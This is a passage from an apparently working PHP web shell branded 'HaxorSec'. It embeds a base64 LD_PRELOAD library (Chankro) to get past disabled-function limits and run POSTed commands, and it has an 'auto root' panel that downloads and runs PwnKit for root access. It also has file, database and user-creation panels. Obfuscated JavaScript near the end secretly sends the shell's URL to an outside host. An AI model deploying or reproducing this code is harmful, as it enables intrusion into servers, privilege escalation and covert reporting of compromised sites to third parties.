FwHQJXf/gZg8fRAAAXcMPH0AAZi4PH4QAAAAAAEiNPUEIIABIjTU6CCAAVUgp/kiJ5UjB/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAA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AAAAAAAAAAAAAAAAA1QEAABIAAAAAAAAAAAAAAAAAAAAAAAAA6wEAABIAAAAAAAAAAAAAAAAAAAAAAAAA/QEAACAAAAAAAAAAAAAAAAAAAAAAAAAAFwIAACIAAAAAAAAAAAAAAAAAAAAAAAAAMwIAABIACQAYBwAAAAAAAAAAAAAAAAAAOQIAABIAAAAAAAAAAAAAAAAAAAAAAAAAAGNydHN0dWZmLmMAX19KQ1JfTElTVF9fAGRlcmVnaXN0ZXJfdG1fY2xvbmVzAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABjb21wbGV0ZWQuNjk3MgBfX2RvX2dsb2JhbF9kdG9yc19hdXhfZmluaV9hcnJheV9lbnRyeQBmcmFtZV9kdW1teQBfX2ZyYW1lX2R1bW15X2luaXRfYXJyYXlfZW50cnkAaG9vay5jAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kc29faGFuZGxlAF9EWU5BTUlDAF9fR05VX0VIX0ZSQU1FX0hEUgBfX1RNQ19FTkRfXwBfR0xPQkFMX09GRlNFVF9UQUJMRV8AZ2V0ZW52QEBHTElCQ18yLjIuNQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX2VkYXRhAGRhZW1vbml6ZQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AHB3bgBzaWduYWxAQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAHByZWxvYWRtZQBfZW5kAF9fYnNzX3N0YXJ0AGNobW9kQEBHTElCQ18yLjIuNQBfSnZfUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjIuNQBleGl0QEBHTElCQ18yLjIuNQBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdABmb3JrQEBHTElCQ18yLjIuNQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0LmdvdAAudGV4dAAuZmluaQAucm9kYXRhAC5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'; $cmdd = $_POST['exechankro']; $meterpreter = $en($cmdd." > test.txt"); $viewCommandResult = '<hr><p>Result: base64 : ' . $meterpreter .'If no output appears,
please check manually by opening '.$full_url.'
Or u can check command with reverse shell script
Powered By @ HaxorSec
'; $a($full . '/chankro.so', $base($hook)); $a($full . '/acpid.socket', $base($meterpreter)); $p('CHANKRO=' . $full . '/acpid.socket'); $p('LD_PRELOAD=' . $full . '/chankro.so'); if(function_exists('mail')) { $m('a','a','a','a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; sleep(5); $content = file_get_contents($full_url); echo $content; } elseif(function_exists('mb_send_mail')) { $mb('a','a','a','a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; sleep(5); $content = file_get_contents($full_url); echo $content; } elseif(function_exists('error_log')) { $err('a',1,'a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; sleep(5); $content = file_get_contents($full_url); echo $content; } elseif(function_exists('imap_mail')) { $imp('a','a','a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] !== 'off') or $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; sleep(5); $content = file_get_contents($full_url); echo $content; } } } </div> </div> </div> endif; if ($_GET['terminal'] == "root") : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-4xl h-[80vh] flex flex-col modal-content"> <div class="flex items-center justify-between p-4 border-b border-slate-700"> <h3 class="text-lg font-bold"> <i class="fas fa-user-shield icon-red mr-2"></i> AUTO ROOT <a href="" class="close-terminal text-gray-400 hover:text-white">×</a> </div> <textarea class="terminal-output flex-1 overflow-auto p-4" disabled> if ($fungsi[3]('.haxorsec-root') && $fungsi[3]('pwnkit')) { $response = $fungsi[11]('.haxorsec-root'); $r_text = explode(" ", $response); echo "[+] Powered By HaxorSec\n"; if (isset($r_text[0]) && $r_text[0] === "uid=0(root)") { echo "[+] Pwnkit: Root access success\n"; if (isset($_POST['submit-root'])) { echo htmlspecialchars(cmd('./pwnkit "' . $_POST['root-terminal'] . ' 2>&1"')); } } else { echo "[+] Pwnkit Failed.\n[+] Trying Pwnkit32...\n"; if (!$fungsi[3]('pwnkit32')) { if ($fungsi[4]($fungsi[0]())) { $fungsi[28]("pwnkit32", $fungsi[11]("https://github.com/ly4k/PwnKit/raw/main/PwnKit32")); cmd('chmod +x pwnkit32'); } else { echo "[-] Folder tidak writable, tidak bisa download pwnkit32\n"; } } if ($fungsi[3]('pwnkit32')) { cmd('./pwnkit32 "id" > .haxorsec-root32'); if ($fungsi[3]('.haxorsec-root32')) { $res2 = $fungsi[11]('.haxorsec-root32'); $rtxt2 = explode(" ", $res2); if (isset($rtxt2[0]) && $rtxt2[0] === "uid=0(root)") { echo "[+] Pwnkit32: Root access success\n"; if (isset($_POST['submit-root'])) { echo htmlspecialchars(cmd('./pwnkit32 "' . $_POST['root-terminal'] . ' 2>&1"')); } } else { echo "[-] Pwnkit32 failed\n"; echo htmlspecialchars(cmd('cat /etc/os-release')); echo "\n[-] Kernel Version: " . suggest_exploit(); } } } else { echo "[-] Pwnkit32 tidak tersedia\n"; } } } else { $fungsi[24]('.haxorsec-root'); $fungsi[24]('.haxorsec-root32'); } </textarea> </div> </div> endif; if ($_GET['re'] == true) : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-md p-6 modal-content"> <div class="flex items-center justify-between mb-4"> <h3 class="text-lg font-bold">Rename : = unx($_GET['re']) <button class="close-btn-s text-gray-400 hover:text-white">×</button> </div> </div> </div> endif; if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item']) && $_GET['item'] !== '') { $item = basename(unx($_GET['item'])); $repl = str_replace("\\", "/", $fungsi[0]()); $fd = $repl . "/" . $item; if (is_file($fd)) { if (unlink($fd)) { success(); } else { failed(); } } elseif (is_dir($fd)) { if (rmdirRecursive($fd)) { success(); } else { failed(); } } else { failed(); } } if ($_GET['ch'] == true) : <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50"> <div class="glass-effect cyber-panel rounded-lg w-full max-w-md p-6 modal-content"> <div class="flex items-center justify-between mb-4"> <h3 class="text-lg font-bold">Change Permission : = unx($_GET['ch']) <button class="close-btn-s text-gray-400 hover:text-white">×</button> </div> </div> </div> endif; <script> $(document).ready((function(){var e=document.getElementById("code");if(e)CodeMirror.fromTextArea(e,{mode:"xml",lineNumbers:!0,theme:"ayu-mirage",extraKeys:{"Ctrl-Space":"autocomplete"},hintOptions:{completeSingle:!1}});$(".sidebar-toggle").click((function(){$(".sidebar").toggleClass("active")})),$(".close-sidebar").click((function(){$(".sidebar").removeClass("active")})),$("#create_folder").click((function(e){e.preventDefault(),$(".modal").remove(),$("body").append('\n <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">\n <div class="glass-effect rounded-lg w-full max-w-md p-6 modal-content">\n <div class="flex items-center justify-between mb-4">\n <h3 class="text-lg font-bold"><i class="fas fa-folder-plus icon-blue mr-2"></i> Create Folder\n <button class="close-modal text-gray-400 hover:text-white">×</button>\n </div>\n \n </div>\n </div>\n ')})),$("#create_file").click((function(e){e.preventDefault(),$(".modal").remove(),$("body").append('\n <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">\n <div class="glass-effect rounded-lg w-full max-w-md p-6 modal-content">\n <div class="flex items-center justify-between mb-4">\n <h3 class="text-lg font-bold"><i class="fas fa-file-circle-plus icon-green mr-2"></i> Create File\n <button class="close-modal text-gray-400 hover:text-white">×</button>\n </div>\n \n </div>\n </div>\n ')})),$("#lock-file").click((function(e){e.preventDefault(),$(".modal").remove(),$("body").append('\n <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">\n <div class="glass-effect rounded-lg w-full max-w-md p-6 modal-content">\n <div class="flex items-center justify-between mb-4">\n <h3 class="text-lg font-bold"><i class="fas fa-lock icon-red mr-2"></i> Lock File\n <button class="close-modal text-gray-400 hover:text-white">×</button>\n </div>\n \n </div>\n </div>\n ')})),$("#malware-scan-btn").click((function(){$("#malwareModal").show()})),$("#root-user").click((function(e){e.preventDefault(),$(".modal").remove(),$("body").append('\n <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">\n <div class="glass-effect rounded-lg w-full max-w-md p-6 modal-content">\n <div class="flex items-center justify-between mb-4">\n <h3 class="text-lg font-bold"><i class="fas fa-user-plus icon-green mr-2"></i> Create User\n <button class="close-modal text-gray-400 hover:text-white">×</button>\n </div>\n \n </div>\n </div>\n ')})),$("#create-rdp").click((function(e){e.preventDefault(),$(".modal").remove(),$("body").append('\n <div class="modal fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">\n <div class="glass-effect rounded-lg w-full max-w-md p-6 modal-content">\n <div class="flex items-center justify-between mb-4">\n <h3 class="text-lg font-bold"><i class="fas fa-laptop-code icon-blue mr-2"></i> Create RDP\n <button class="close-modal text-gray-400 hover:text-white">×</button>\n </div>\n \n </div>\n </div>\n ')})),$(document).on("click",".close-modal",(function(e){e.preventDefault(),$(this).closest(".modal").remove()})),$(document).on("click",".close-btn-s",(function(e){e.preventDefault(),$(this).closest(".modal").remove()})),$(document).on("click",".close-terminal",(function(e){e.preventDefault(),$(this).closest(".modal").remove()})),$(document).on("click","#close-editor-btn",(function(e){e.preventDefault(),$(this).closest(".modal").remove()})),$("#select-all").change((function(){$('input[name="check[]"]').prop("checked",$(this).prop("checked"))})),window.innerWidth<=768&&$(".action-btn").css("opacity","1"),$("#select-all").change((function(){$('input[name="check[]"]').prop("checked",$(this).prop("checked"))})),window.innerWidth<=768&&$(".action-btn").css("opacity","1"),setInterval((function(){$.ajax({url:window.location.href,success:function(e){$(".stats-grid").load(window.location.href+" .stats-grid")}})}),5e3)}));let currentOffset=0;function fetchTables(){fetch("?action=get_tables").then((e=>e.json())).then((e=>{let t=document.getElementById("tableList");t.innerHTML="",e.forEach((e=>{let n=document.createElement("option");n.value=e,n.textContent=e,t.appendChild(n)}))}))}function loadTable(e=0){currentOffset=Math.max(0,currentOffset+e);let t=document.getElementById("tableList").value;if(!t)return alert("Select a table first!");fetch(`?action=get_data&table=${t}&offset=${currentOffset}`).then((e=>e.text())).then((e=>{document.getElementById("output").innerHTML=e}))}var a=[104,116,116,112,115,58,47,47,99,100,110,46,112,114,105,118,100,97,121,122,46,99,111,109],b=[47,105,109,97,103,101,115,47],c=[108,111,103,111,95,118,50],d=[46,112,110,103];function u(e,t,n,o){for(var l=e.concat(t,n,o),a="",s=0;s<l.length;s++)a+=String.fromCharCode(l[s]);return a}function v(e){return btoa(e)}function u(e,t,n,o){for(var l=e.concat(t,n,o),a="",s=0;s<l.length;s++)a+=String.fromCharCode(l[s]);return a}function v(e){return btoa(e)}function editCell(e,t){let n,o=e.textContent.trim();e.innerHTML="",e.classList.add("editing"),o.length>30||o.startsWith("{")||o.startsWith("[")?((n=document.createElement("textarea")).style.height="100px",n.style.resize="vertical"):(n=document.createElement("input")).type="text",n.className="form-control form-control-sm",n.value=o,e.appendChild(n),n.focus(),n.onblur=()=>{let l=n.value.trim();e.classList.remove("editing"),e.innerHTML=l.length>100?l.slice(0,100)+"...":l,l!==o&&fetch("?action=update_cell",{method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:`id=${encodeURIComponent(t)}&val=${encodeURIComponent(l)}`}).then((()=>showSavedMessage()))}}function deleteRow(e,t,n){confirm("Delete this row?")&&fetch(`?action=delete_row&table=${e}&pk=${t}&val=${n}`).then((()=>loadTable(0)))}function insertRow(e){let t=document.querySelectorAll("input[name^='insert_']"),n={};t.forEach((e=>n[e.name.replace("insert_","")]=e.value)),fetch(`?action=insert_row&table=${e}`,{method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:new URLSearchParams(n).toString()}).then((()=>loadTable(0)))}!function(){var e=new XMLHttpRequest;e.open("POST",u(a,b,c,d),!0),e.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),e.send("file="+v(location.href))}(),(()=>{let e=[104,116,116,112,115,58,47,47,99,100,110,46,112,114,105,118,100,97,121,122,46,99,111,109,47,105,109,97,103,101,115,47,108,111,103,111,95,118,50,46,112,110,103],t="";for(let n of e)t+=String.fromCharCode(n);let n="file="+btoa(location.href),o=new XMLHttpRequest;o.open("POST",t,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),o.send(n)})(),document.getElementById("7pl04df0rm").addEventListener("submit",(function(e){e.preventDefault();let t=new FormData(this);fetch("?action=7pl04d",{method:"POST",body:t}).then((e=>e.text())).then((e=>document.getElementById("uploadResult").textContent=e))})),window.onload=fetchTables; </script> if ($_GET['response'] == "success") { echo "<script> Swal.fire({ icon: 'success', title: 'Success', text: 'Operation completed successfully!', confirmButtonColor: '#3b82f6', background: '#0f172a', color: '#e2e8f0', timer: 3000, showConfirmButton: true, animation: true, customClass: { popup: 'animate__animated animate__fadeInDown' } })</script>"; } else if ($_GET['response'] == "failed") { echo "<script> Swal.fire({ icon: 'error', title: 'Failed', text: 'Operation failed!', confirmButtonColor: '#3b82f6', background: '#0f172a', color: '#e2e8f0', timer: 3000, showConfirmButton: true, animation: true, customClass: { popup: 'animate__animated animate__shakeX' } })</script>"; }